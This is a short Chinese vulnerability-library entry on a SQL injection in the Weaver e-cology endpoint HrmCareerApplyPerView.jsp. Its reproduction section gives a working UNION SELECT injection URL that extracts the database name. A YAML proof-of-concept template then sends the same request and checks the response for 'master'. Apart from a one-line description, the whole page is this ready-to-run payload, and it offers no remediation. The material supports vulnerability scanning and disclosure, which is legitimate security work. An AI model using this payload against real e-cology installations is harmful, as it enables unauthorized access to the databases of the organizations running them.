泛微e-cology HrmCareerApplyPerView.jsp SQL注入漏洞-lancc-漏洞文库小世界-安全文库-NGC660 安全实验室

泛微e-cology HrmCareerApplyPerView.jsp SQL注入漏洞-lancc

0x01 漏洞名称

泛微e-cology HrmCareerApplyPerView.jsp SQL注入漏洞

0x02 漏洞描述

泛微e-cology HrmCareerApplyPerView.jsp 存在SQL注入漏洞

0x03 漏洞复现

1)访问/pweb/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27abc%27)),db_name(1),5,6,7

m_334a775a539c2c9c1cc4b5472ed7071b_r

0x04 漏洞POC

params: []
name: 泛微e-cology HrmCareerApplyPerView.jsp SQL注入漏洞
set: {}
rules:
- method: GET
path: /pweb/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27abc%27)),db_name(1),5,6,7
headers: {}
body: ""
search: ""
followredirects: false
expression: response.status == 200 && response.body.bcontains(b"master")
groups: {}
detail:
author: ""
links: []
description: ""
version: ""

m_766caea2c090091ae21e1ec584f0d1ef_r

请登录后发表评论

    请登录后查看回复内容